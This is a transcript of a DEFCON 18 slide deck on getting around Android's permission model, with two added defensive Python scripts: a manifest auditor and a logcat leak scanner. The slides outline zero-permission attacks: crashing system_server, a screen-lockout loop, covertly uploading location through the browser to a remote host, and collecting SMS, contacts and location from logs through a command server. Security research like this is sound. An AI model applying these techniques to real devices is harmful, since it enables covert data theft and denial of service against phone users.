DEFCON 18 - Lineberry - Not the Permissions You Are Looking For
TRANSCRIPT
-
8/4/2019 DEFCON 18 Lineberry Not the Per Missions You Are Looking For
1/87
THESE AREN'T THE PERMISSIONS YOU'RE LOOKING FOR
Anthony Lineberry
David Luke Richardson
Tim Wyatt
DefCon 18
-
AGENDA
Android Internals Overview
Security/Permission Model
Why Ask For Permission When You Can Ask For Forgiveness?
Log-Cat: Our Inside Mole
The Ultimate Permission (Yes, we're talking about root)
Mitigation
-
ANDROID INTERNALS
Diving Into the Belly of the Beast
-
ANDROID MANIFEST
AndroidManifest.xml: every application must have one
Declares the package name, a unique identifier for every app
Describes the application's components (Activities, Services, BroadcastReceivers, etc.)
Declares requested permissions needed to access protected APIs (if only there were a way to get around that...)
Declares permissions other applications are required to have to interact with the application's components
-
ACTIVITY
A way for users to interact with the application
Composed of Views:
Button
TextView
ImageView
etc...
-
ACTIVITY
Managed as an Activity stack
New/foreground Activity on top of the stack, in the running/active state
Previous Activities below in the paused state
Removed from the stack when the Activity finishes
-
ACTIVITY
An application can start another application's Activity!
The Activity runs in its own application's process.
Callee doesn't necessarily have access to the Activity's data
The permission attribute in the manifest can restrict who can start the Activity
-
INTENT
An abstract description of an operation to be performed
Simple IPC for applications
Intents can be sent with data
-
INTENT
Can be used to start an Activity with startActivity()
Intents can be broadcast system wide with sendBroadcast()
Communicate with a background Service
Two main components:
Action
Data (URI: http:, content:, geo:, etc...)
-
BROADCAST RECEIVER
Receives an Intent
Can be created dynamically with registerBroadcast() or declared in the manifest with the <receiver> tag
Receives two types of broadcasts:
Normal Broadcasts: asynchronous; cannot be aborted
Ordered Broadcasts: delivered serially; can be aborted or pass a result to the next receiver
-
BROADCAST RECEIVER
Permissions can be enforced
Sender can declare a permission for who can receive the Intent
Receiver can declare a permission for who can send an Intent to it
-
SERVICE
Component to do work in the background
NOT a separate process
NOT a thread
Kind of like an Activity without a UI
Can enforce access to service with a required permission
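The manifest-level access permissions described on the Manifest, Activity, Broadcast Receiver and Service slides can be audited mechanically. The following Python script is an added example and is not code from the talk: it parses a constructed AndroidManifest.xml and lists the components other apps can reach (android:exported="true", or an <intent-filter> with android:exported left to the pre-Android-12 default) that declare no android:permission; the launcher Activity is skipped because it has to be reachable.

```python
"""Audit an AndroidManifest.xml for components other apps can reach that
enforce no access permission.  Added example; the manifest below is
constructed for illustration, not taken from the talk."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
LAUNCHER = "android.intent.category.LAUNCHER"

# Constructed sample manifest: two components are reachable without a permission.
SAMPLE_MANIFEST = """
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.example.notes">
  <permission android:name="com.example.notes.permission.SYNC"
              android:protectionLevel="signature"/>
  <application>
    <activity android:name=".MainActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <service android:name=".SyncService" android:exported="true"/>
    <service android:name=".ProtectedSyncService" android:exported="true"
             android:permission="com.example.notes.permission.SYNC"/>
    <receiver android:name=".BootReceiver">
      <intent-filter>
        <action android:name="android.intent.action.BOOT_COMPLETED"/>
      </intent-filter>
    </receiver>
    <receiver android:name=".InternalReceiver" android:exported="false"/>
  </application>
</manifest>
"""


def android_attr(elem, name):
    """Read an android:-namespaced attribute (Clark notation) or None."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def is_exported(component):
    """True if other apps can target the component: android:exported="true",
    or exported omitted while an <intent-filter> is present (the default
    before Android 12, which covers the versions discussed in the talk)."""
    exported = android_attr(component, "exported")
    if exported is not None:
        return exported.lower() == "true"
    return component.find("intent-filter") is not None


def is_launcher(component):
    """The home-screen entry point has to be reachable; don't flag it."""
    return any(android_attr(c, "name") == LAUNCHER
               for c in component.iter("category"))


def audit_manifest(manifest_xml):
    """Return (android:name, tag) for each exported activity/service/receiver
    that carries no android:permission attribute."""
    app = ET.fromstring(manifest_xml).find("application")
    findings = []
    if app is None:
        return findings
    for tag in ("activity", "service", "receiver"):
        for comp in app.findall(tag):
            if is_launcher(comp) or not is_exported(comp):
                continue
            if android_attr(comp, "permission") is None:
                findings.append((android_attr(comp, "name"), tag))
    return findings


if __name__ == "__main__":
    for name, tag in audit_manifest(SAMPLE_MANIFEST):
        print("%s %s is reachable by other apps without android:permission" % (tag, name))
```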
-
SECURITY/PERMISSION MODEL
The Mythical Sandbox
-
THE SANDBOX
Not a VM sandbox as many believe
Unix multi-user (uid/gid) sandbox!
Each app is a different uid
Lightweight VM running for each process
Breaking out of the VM gains you nothing
Apps can request to share a uid (both must be signed with the same key)
-
PERMISSIONS
Default application has no permissions granted
Finer grained access to content/APIs
android.permission.READ_SMS
android.permission.CHANGE_WIFI_STATE
etc.
Declared in AndroidManifest.xml
-
WHY ASK FOR PERMISSION WHEN YOU CAN ASK FOR FORGIVENESS?
-
WHY PERMISSIONS MATTER
Permissions gate what an App can do
Users are required to OK permissions before downloading an App
Users can decipher to some degree whether permissions are appropriate
-
WHY PERMISSIONS MATTER
(image: two permission screens compared) VS
-
WHAT DOES 0 PERMISSIONS MEAN?
No permission screen at all!
Straight to download
Why should a user worry about an App Android doesn't warn about?
-
REBOOT
WITH 0 PERMISSIONS
REBOOT permission is not normally grantable to apps.
Requires SystemOrSignature
But that won't stop us!
-
REBOOT
WITH 0 PERMISSIONS
There are many approaches depending on Android OS version
The easiest and most reliable we've found so far involves Toast notifications
-
REBOOT
WITH 0 PERMISSIONS
Every time you try to display a Toast it creates a weak JNI reference in system_server
-
REBOOT
WITH 0 PERMISSIONS
At 2001* global references system_server SIGSEGVs
* Exact number depends on hardware and OS version
-
REBOOT
WITH 0 PERMISSIONS
Custom Toasts are also implementable, which can display any view
Including invisible views!
-
RECEIVE_BOOT_COMPLETE
WITH 0 PERMISSIONS
Permission to automatically start at boot
Too easy - the permission isn't checked!
-
START ON INSTALL
WITH 0 PERMISSIONS
Interesting trick to use in conjunction with another attack
No permission exists to allow this functionality
Google Analytics referrer tracking to the rescue!
-
START ON INSTALL
WITH 0 PERMISSIONS
Just write your own Receiver
But there are some caveats...
-
START ON INSTALL
WITH 0 PERMISSIONS
Requires a referrer included in the URL leading to the App:
Admob
Weblink
OR Android 2.2, which always includes referrer info
Example: http://market.android.com/search?q=pname:com.nethack&referrer=utm_source%3Dadmob%26utm_medium%3Dbanner%26utm_term%3Darcade%252Bgame%26utm_campaign%3DMalicious_Campaign
-
CIRCLE OF DEATH: UI HOSTILE TAKEOVER
WITH 0 PERMISSIONS
Launch an Activity that consumes all key presses
Can't swallow HOME or a long press of HOME
Relaunch when the Activity exits
An Activity can't launch itself when destroyed, however
-
CIRCLE OF DEATH
WITH 0 PERMISSIONS
So create a circle of death
When the Activity is destroyed, launch a Service. The Service relaunches the destroyed Activity
-
CIRCLE OF DEATH
WITH 0 PERMISSIONS
To remove: boot into safe mode (no non-system apps are able to run) and uninstall the malicious application.
Bonus points: maximize volume and play an obnoxious sound.
-
UPLOAD
WITH 0 PERMISSIONS
Apps or games not requesting INTERNET seem low risk.
Your sandbox can't access the internet. Ask your neighbor!
Pop open a browser. (NetHack)
Example: http://mysite.com/data?lat=
-
UPLOAD
WITH 0 PERMISSIONS
Can we do this secretly?
Obscuring the browser (onPause()) stops the page from loading.
-
UPLOAD
WITH 0 PERMISSIONS
How about we only pop up browsers when the screen is off?
Need to close the browser when the screen turns on
Bonus points: redirect to http://www.google.com when you're done (or read browser history from logs)
-
UPLOAD
WITH 0 PERMISSIONS
But what about two way communication?
Example: http://67.180.50.243:8080/track?lat=123.2&lon=32.2&count=
-
INTERNET
WITH 0 PERMISSIONS
Pop a browser to a page with a downloadable content-type (http://mysite.com/data.zip)
The default Android browser automatically saves it to /sdcard/downloads/data.zip
But there are some downsides...
-
INTERNET
WITH 0 PERMISSIONS
No way to clear notifications
To clean up the filesystem you need to request WRITE_EXTERNAL_STORAGE
Automatically requested if you target Android 1.5
-
INTERNET
WITH 0 PERMISSIONS
How about a custom URI receiver?
Google Maps uses geo:latitude,longitude?zoom to automatically launch their App
We can do the same!
-
INTERNET
WITH 0 PERMISSIONS
We can register ourselves for nethack://
Redirect our page from before to nethack:data?param=server_data
This has to be an Activity, not another component type (it is meant for foreground interactions)
-
INTERNET
WITH 0 PERMISSIONS
The Activity is never seen if you call finish() in onCreate()
Data is available in the Intent
Bonus points: new tab for the nethack URI and redirect the original page to http://google.com
-
INTERNET
WITH 0 PERMISSIONS
Demo
-
APPLICATION LOGGING
import android.util.Log;
...
public class MyClass {
    ...
    // Tag that identifies this class's lines in logcat
    private static final String TAG = "MyLogTag";
    ...
    Log.d(TAG, "Some log content goes here");
    ...
}
-
LOG DEVICES
Main /dev/log/main
Events /dev/log/events
Radio /dev/log/radio
System /dev/log/system
-
/DEV/LOG/EVENTS
This is not the main "logcat" debugging log (Log)!
These diagnostic events are for system integrators, not application authors.
(android.util.EventLog reference)
-
/DEV/LOG/RADIO
Radio command stream and debug data
-
/DEV/LOG/MAIN
-
LOGCAT
-
PERMISSIONS
Ability to read logs is gated by android.permission.READ_LOGS
shell is granted this permission for adb debugging
READ_LOGS is in some ways an alias for READ*
-
THE CLIENT
Android Service that requests:
android.permission.READ_LOGS
android.permission.INTERNET
Downloads policies from the server
Periodically delivers logs matching regex
-
LOGCAT DEVICE
-
LOGMONITOR
-
MONITOR SERVICE
-
SERVER
Rails server supplies C&C and processes device data
Supplies per-device policies
Receives logs meeting policies
Provides an interface to explore logs from multiple devices
Extracts and post-processes log data
-
POLICIES, ETC.
Threw out a few random keywords (insert, update, delete, intent, content, http, etc.)
Picked a couple of pieces of data to toss around
Set up initial expressions and started pushing data through devices.
-
DB_SAMPLE
Logs the first 64 characters of a sampling of queries
Sample rate is based on query execution time
-
CONTENT_SAMPLE
Similar to db_sample, but applies to content provider operations
GET TASKS AND DUMP
-
GET_TASKS AND DUMP
WITH READ_LOGS
READ HISTORY BOOKMARKS
-
READ_HISTORY_BOOKMARKS
WITH READ_LOGS
READ SMS
-
READ_SMS
WITH READ_LOGS
READ CONTACTS
-
READ_CONTACTS
WITH READ_LOGS
ACCESS COARSE LOCATION
-
ACCESS_COARSE_LOCATION
WITH READ_LOGS
-
RESOLVING LOCATION
Lookup service used: http://cellid.labs.ericsson.net/json/lookup
ACCESS FINE LOCATION
-
ACCESS_FINE_LOCATION
WITH READ_LOGS
-
A STORY ... ABOUT 3 GUYS
-
HEADING DOWN 101 ...
-
TO SFO
-
AND HEAD TO VEGAS ...
-
ARRIVING AT MCCARRAN ...
-
TAKE A CAB ACROSS TOWN ...
-
TO CAESARS PALACE
-
TO DEFCON 18
-
THE ULTIMATE PERMISSION
Yes, We're Talking About Root
-
THE ULTIMATE PERMISSION
Phones ship locked down
Everyone wants to use their phone to its full potential
Communities surrounding the rooting of phones have formed
Third party ROMs available to users now
-
HOW DOES ONE GET ROOT?
Android uses a Linux kernel (duh)
Look up old kernel vulns and see if they work!
1.5 (Cupcake) using 2.6.27 kernel
1.6 (Donut), 2.0, 2.1 (Eclair) using 2.6.29
2.2 (Froyo) using 2.6.32
3.0 (Gingerbread) will use 2.6.33/34 (Q4/2010)
-
HOW DOES ONE GET ROOT?
Old/unpatched libraries!
suid binaries with vulns
Pretty much any traditional way since this is Linux
-
CASE STUDY: uevent origin vuln
Similar to the libudev vuln (CVE-2009-1185), discovered by Sebastian Krahmer
Patched in Android 4 days after the exploit was published
Failed check of NETLINK message origin (did it come from the kernel, or did a user send it?...)
Who was vulnerable to this?...
udev fix: http://git.kernel.org/?p=linux/hotplug/udev.git;a=commitdiff;h=e2b362d9f23d4c63018709ab5f81a02f72b91e75
-
CASE STUDY: uevent origin vuln
Rewrote the exploit to run as JNI code from the APK
(With zero permissions!)
Every flagship phone...
...of every major carrier in the US
Oops.
-
THE ROOTING PROBLEM
People want their phones rooted
Rooting is being viewed as a vehicle for modding
Ignoring the large pink elephant: security issues
Unwilling to make details public for fear of the OEM fixing the bug
Leaves everyone with major vulnerabilities
-
WHY ARE PEOPLE ROOTING
Modding phones
Patching process is slow; users want access to the latest and greatest releases
Tethering (free additional features)
-
WHAT CAN YOU DO? (Users)
Don't assume lack of permissions means data is private
Does the app really need the READ_LOGS permission? (Probably not)
Keep your phone patched up to date
-
WHAT CAN YOU DO? (Developers)
Users are trusting you with access to their private data
Be careful what you do with that...
Be paranoid about what you log
If others don't need to access your components, enforce an access permission
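The talk's log monitor delivers log lines matching server-supplied regexes; a developer can run the same idea against their own pre-release logcat output to find what they are leaking before a READ_LOGS holder does. The Python below is an added example, not the authors' LogMonitor code: it parses logcat "brief"-format lines (constructed here), flags messages under the app's own tags that contain URLs with query strings, e-mail addresses, coordinates or SQL (the kinds of data the READ_LOGS slides show leaking), and offers a scrubber to apply before anything reaches Log.d().

```python
"""Scan logcat output for the kinds of data the talk shows leaking through
/dev/log/main, and scrub them before logging.  Added example; log lines are
constructed, not captured from a real device."""
import re

# logcat "brief" format: <priority>/<tag>(<pid>): <message>
BRIEF_LINE = re.compile(r"^([VDIWEF])/(.+?)\s*\(\s*(\d+)\):\s?(.*)$")

# Patterns for data that should never reach the shared log.
SENSITIVE = {
    "url_with_query": re.compile(r"https?://\S+\?\S+"),
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "lat_lon": re.compile(r"-?\d{1,3}\.\d{3,},\s*-?\d{1,3}\.\d{3,}"),
    "sql": re.compile(r"\b(?:INSERT|UPDATE|DELETE|SELECT)\b.*", re.I),
}

# Constructed sample output; ActivityManager is a system tag, not ours.
SAMPLE_LOGCAT = [
    "D/NotesSync( 1234): GET http://api.example.test/search?q=hotel&token=SECRET_TOKEN",
    "I/NotesSync( 1234): share sheet target someone@example.test",
    "D/NotesDb( 1234): INSERT INTO notes(body) VALUES ('meet at 10')",
    "D/LocationHelper( 1234): last fix 36.1162, -115.1745",
    "I/ActivityManager(  987): Displayed com.example.notes/.MainActivity",
]
OWN_TAGS = {"NotesSync", "NotesDb", "LocationHelper"}


def parse_brief(line):
    """Split one brief-format line into its fields, or None if it is not one."""
    m = BRIEF_LINE.match(line)
    if not m:
        return None
    prio, tag, pid, msg = m.groups()
    return {"prio": prio, "tag": tag, "pid": int(pid), "msg": msg}


def scan_logcat(lines, own_tags):
    """Return (tag, kind, matched_text) for every sensitive match in lines
    written under one of own_tags.  Other apps' tags are skipped: a
    READ_LOGS holder sees them too, but they are not this app's leak to fix."""
    findings = []
    for line in lines:
        entry = parse_brief(line)
        if entry is None or entry["tag"] not in own_tags:
            continue
        for kind, rx in SENSITIVE.items():
            m = rx.search(entry["msg"])
            if m:
                findings.append((entry["tag"], kind, m.group(0)))
    return findings


def scrub(msg):
    """Replace sensitive substrings so the message is safe to hand to Log.d()."""
    for kind, rx in SENSITIVE.items():
        msg = rx.sub("[REDACTED:%s]" % kind, msg)
    return msg


if __name__ == "__main__":
    for tag, kind, text in scan_logcat(SAMPLE_LOGCAT, OWN_TAGS):
        print("%-15s %-15s %s" % (tag, kind, text))
    print(scrub(parse_brief(SAMPLE_LOGCAT[0])["msg"]))
```

Feed it `adb logcat -d -v brief` output from a test device to check a build before release.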
-
WHAT CAN YOU DO? (OEMs)
See developer advice
Set a good example for other developers!
Why should they care if they leak private info if you are already doing it too?
Please patch your libraries/kernels
-
QUESTIONS?
Come see us in the Track 1 Q/A room!
-
REFERENCES
SDK Reference Docs
http://developer.android.com/reference/packages.html
Jon Oberheide - Google's Android Platform (CanSecWest 2009)
http://jon.oberheide.org/files/cansecwest09-android.pdf
Jesse Burns - Exploratory Android Surgery (BlackHat USA 2009)
https://www.isecpartners.com/files/iSEC_Android_Exploratory_Blackhat_2009.pdf
CVE-2009-1185 - https://bugzilla.redhat.com/show_bug.cgi?id=495051
http://c-skills.blogspot.com/2010/07/android-trickery.html